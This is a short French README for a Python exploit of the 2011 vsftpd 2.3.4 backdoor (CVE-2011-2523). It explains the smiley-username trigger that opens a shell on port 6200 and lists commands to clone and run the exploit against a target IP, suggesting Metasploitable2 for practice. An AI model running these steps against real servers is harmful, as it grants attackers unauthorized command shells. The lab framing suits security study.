
Exploit Python pour vsftpd 2.3.4 - Exécution de commandes par backdoor
vsftpd, qui signifie Very Secure FTP Daemon, est un serveur FTP pour les systèmes de type Unix, y compris Linux. Il est sous licence GNU General Public License. Il prend en charge IPv6 et SSL.
En juillet 2011, il a été découvert que la version 2.3.4 de vsftpd téléchargeable depuis le site principal avait été compromise. Les utilisateurs se connectant à un serveur vsftpd-2.3.4 compromis peuvent saisir un smiley :) comme nom d'utilisateur et obtenir un shell de commande sur le port 6200. Il ne s'agissait pas d'une faille de sécurité dans vsftpd, mais plutôt de quelqu'un qui avait téléversé une version différente de vsftpd contenant une porte dérobée. Depuis lors, le site a été déplacé vers Google App Engine.
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/padsalatushal/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP
Exemple : python3 exploit.py -host 192.168.168.128

Vous pouvez tester l'exploit sur Metasploitable2